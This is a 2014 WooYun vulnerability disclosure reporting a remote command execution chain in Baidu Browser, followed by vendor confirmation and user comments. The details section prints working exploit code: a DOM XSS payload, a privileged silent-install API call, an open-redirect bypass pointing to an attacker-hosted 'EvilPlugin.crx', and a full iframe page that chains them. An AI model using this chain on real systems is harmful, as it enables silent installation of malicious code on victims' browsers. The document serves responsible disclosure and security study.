当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081309

漏洞标题:百度浏览器远程命令执行四

相关厂商:百度

漏洞作者: gainover

提交时间:2014-10-30 09:25

修复时间:2015-01-28 09:26

公开时间:2015-01-28 09:26

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-30: 细节已通知厂商并且等待厂商处理中
2014-10-30: 厂商已经确认,细节仅向厂商公开
2014-11-02: 细节向第三方安全合作伙伴开放
2014-12-24: 细节向核心白帽子及相关领域专家公开
2015-01-03: 细节向普通白帽子公开
2015-01-13: 细节向实习白帽子公开
2015-01-28: 细节向公众公开

简要描述:

轻轻的我来了,正如我轻轻的抖。
版本又更新了,但漏洞却没有走。
最新版本(6.5.0.50459),另一个某API虽然做出限制,但限制依然宽松,结合一些乌云上公开但未修复的鸡肋,可轻松绕过限制导致远程命令执行缺陷。

详细说明:

1. 首先拿出前面在xapp.baidu.com下扫荡出的一个DOM XSS

http://xapp.baidu.com/browserextension/single/tieba/tiebarslidebar/v_6-0/tiebaslidebar-login-confirm.html#!f=aaaa&uid=vvvvv&uname=<img src=1 onerror=alert(1)>


恩,标准的DOM XSS~
2. 对 《百度浏览器远程命令执行》中所使用的AppService.AppMarket.DownloadPack API进行再次分析,发现如果对 AppService.AppMarket.DownloadPack 的参数 中 ID指定为 某一个已知安装的APP ID,则不会有安装提示,即使update值为false,例如:

window.external.StartRequest(222,"AppService.AppMarket.DownloadPack","(function(id,res){console.log(res)})","{\"ID\":\"Silenter\",\"UPDATE\":\"false\",\"URL\":\"http://dlsw.br.baidu.com/49411271abae81764cf268983c95d9d7.crx\"}",window,"");


3. 然后相比第一次,这一次,开发人员对 URL参数进行了判断,判断要求如下:
A. URL必须为*.baidu.com域名下的资源
B. URL必须为 .crx结尾
4. 这种限制显然过于宽松, URL地址可以轻松被一些方式绕过:比如在baidu.com域名下上传资源,但是要找到这样的点不太容易,但是还有一种更简单的办法,就是找一个baidu.com域下的302跳转,跳到自己的资源地址。那么,302跳转好找么?
5. 嗯,我都懒得去百度GOOGLE搜索了,直接在乌云搜索“百度 跳转”,因为URL跳转什么的经常不被重视哇,所以估计还有没修好的。
于是,很顺利的搜索到以下漏洞: WooYun: 百度url跳转及反射型xss
《百度url跳转及反射型xss》
公开时间: 2014-08-10 19:10
该漏洞已经公开,但并未修复。
6. 根据以上漏洞信息,构建以下URL跳转:

http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovLzE5Mi4xNjguMS4xMDUvRXZpbFBsdWdpbi5jcng=&.crx


该URL会跳转到 http://192.168.1.105/EvilPlugin.crx, 其中URL里的 &.crx是为了满足步骤3里所描述的判断规则。
7. 因此不难构造出漏洞利用代码:

window.external.StartRequest(222,"AppService.AppMarket.DownloadPack","(function(id,res){console.log(res)})","{\"ID\":\"Silenter\",\"UPDATE\":\"false\",\"URL\":\"http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovLzE5Mi4xNjguMS4xMDUvRXZpbFBsdWdpbi5jcng=&.crx\"}",window,"");


8. 利用xapp.baidu.com下的XSS调用以上代码:

<html>
<head>
</head>
<body>
	<iframe src='http://xapp.baidu.com/browserextension/single/tieba/tiebarslidebar/v_6-0/tiebaslidebar-login-confirm.html#!f=aaaa&uid=vvvvv&uname=<img src=1 onerror=eval(window.name)>' name='window.external.StartRequest(222,"AppService.AppMarket.DownloadPack","(function(id,res){console.log(res)})","{\"ID\":\"Silenter\",\"UPDATE\":\"false\",\"URL\":\"http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovLzE5Mi4xNjguMS4xMDUvRXZpbFBsdWdpbi5jcng=&.crx\"}",window,"");'></iframe>
</body>
</html>


9. 运行代码效果如下:

1.jpg


任意打开一个网页后,执行calc

2.jpg

漏洞证明:

演示视频:
http://v.youku.com/v_show/id_XODE0NDUwNjY4.html
密码:
wooyuncmd

修复方案:

1. 修复DOM XSS
http://xapp.baidu.com/browserextension/single/tieba/tiebarslidebar/v_6-0/tiebaslidebar-login-confirm.html#!f=aaaa&uid=vvvvv&uname=<img src=1 onerror=alert(1)>
2. 继续修复 AppService.AppMarket.DownloadPack 的安装判断。

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-10-30 21:38

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无

漏洞评价:

评论

  1. 2014-10-30 09:29 | Jim叔叔 ( 普通白帽子 | Rank:153 漏洞数:25 | 这样子不太好吧。。)

    21

  2. 2014-10-30 09:31 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    百度:我都给你20了你还要怎样?二哥:约?百度:约!

  3. 2014-10-30 09:32 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    百度:我都给你20了你还要怎样? 二哥:约? 百度:约!

  4. 2014-10-30 09:58 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    百度:我都给你20了你还要怎样? 二哥:约? 百度:约!

  5. 2014-10-30 09:59 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    二哥 你是准备把百度浏览器玩的混不下去么

  6. 2014-10-30 10:04 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    百度:我都给你20了你还要怎样? 二哥:约? 百度:约!

  7. 2014-10-30 10:07 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    百度你们家浏览器做这么渣你家里人造么?

  8. 2014-10-30 10:07 | 闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)

    百度你们家浏览器做这么渣你家里人造么?

  9. 2014-10-30 10:08 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)

    百度你们家浏览器做这么渣你家里人造么?

  10. 2014-10-30 10:08 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    二哥准备了20连载的

  11. 2014-10-30 10:09 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    百度你们家浏览器做这么渣你家里人造么?

  12. 2014-10-30 10:09 | wiluilu ( 路人 | 还没有发布任何漏洞 | 涅槃就是死~)

    百度你们家浏览器做这么渣你家里人造么?

  13. 2014-10-30 10:09 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    百度你们家浏览器做这么渣你家里人造么?

  14. 2014-10-30 10:27 | VinGogh ( 路人 | Rank:28 漏洞数:7 | G.X.)

    百度被玩坏了

  15. 2014-10-30 10:49 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    肯定有五

  16. 2014-10-30 11:25 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    这事要刷屏的节奏!

  17. 2014-10-30 11:26 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    我叫王大锤,万万没想到,二哥又找出了百度浏览器远程命令执行漏洞

  18. 2014-10-30 14:09 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    他说的好有道理,我竟无言以对。

  19. 2014-10-30 14:45 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @奇虎360 百度浏览器做这么渣,你造么?

  20. 2014-10-30 17:51 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    挖掘机技术哪家强?

  21. 2014-10-30 19:08 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    有种人 是让人膜拜的

  22. 2014-10-31 00:50 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    4个漏洞96rank,名次瞬间提升了3名。。。

  23. 2014-10-31 01:25 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @px1624 嘿嘿,想我5个100rank,8天升级普通,你恨了吗?

  24. 2014-10-31 13:56 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @老和尚 4个96和5个100,哪个牛逼?

  25. 2014-10-31 14:00 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @px1624 额、我算算啊。肯定是我咯

  26. 2014-10-31 14:08 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    96/4=28 100/5=20 28-20=8 5-4=1智商不忍直视。。。。

  27. 2014-10-31 14:09 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @淡漠天空 漠漠、别凑热闹、px肯定是算不来才问我的

  28. 2014-10-31 14:18 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @老和尚 @淡漠天空 哈哈,所以说还是4个96更牛逼么

  29. 2014-10-31 14:20 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @px1624 哎。就知道你算不来、好歹也百度一下啊。偶。百度浏览器被日了.......

  30. 2014-10-31 14:59 | mlyKnown ( 路人 | Rank:2 漏洞数:1 | 咚咚咚咚,查水表啦。)

    百度你们家浏览器做这么渣你家里人造么?

  31. 2014-11-02 21:40 | 帅克笛枫 ( 普通白帽子 | Rank:207 漏洞数:46 | 键盘只为不平而起落,鼠标亦会点到为止!)

    这是嚼了炫迈的感觉嘛?

  32. 2014-11-03 10:56 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    百度:我都给你20了你还要怎样? 二哥:约? 百度:约!

  33. 2014-11-03 13:05 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    百度:我都给你20了你还要怎样? 二哥:约? 百度:约!

  34. 2014-11-03 14:25 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    说明一个问题 只要被高手盯上 无人可以逃脱不过也要让漏洞挖掘带点难得才好

  35. 2014-11-03 14:28 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    @老和尚 怎么都是SQL注入呀、、、、、

  36. 2014-11-04 09:27 | 疯狂的dabing ( 实习白帽子 | Rank:33 漏洞数:9 | Hehe is golden.)

    @淡漠天空 96/4=28 这也是醉了。。。

  37. 2014-11-04 10:26 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @疯狂的dabing 。。。。26 下意识按键位没注意

  38. 2014-11-04 11:48 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    @淡漠天空 96/4=26 这也是醉了。。。

  39. 2014-11-04 12:08 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @大亮 卧槽。。。。24 行了 我学前班别跟我比文化 彻底对自己现在的状态醉了

  40. 2014-11-20 09:10 | wooOver ( 普通白帽子 | Rank:318 漏洞数:83 | 我要控制我自己)

    这个漏洞需要什么条件才能查看呀?

  41. 2014-12-01 17:08 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    url跳转还有这用法,学习学习

  42. 2015-01-22 00:51 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    居然利用了我的漏洞,我要收专利费

  43. 2015-01-22 07:57 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @Mr .LZH -_-||

  44. 2015-01-28 22:57 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

    人家程序员工资都发给你了。

  45. 2015-01-30 16:06 | me1ody ( 路人 | Rank:26 漏洞数:15 | 乌云临时工)

    百度你们家浏览器做这么渣你家里人造么?

  46. 2015-07-18 14:21 | sOnsec ( 实习白帽子 | Rank:93 漏洞数:24 | 安全是什么...)

    膜拜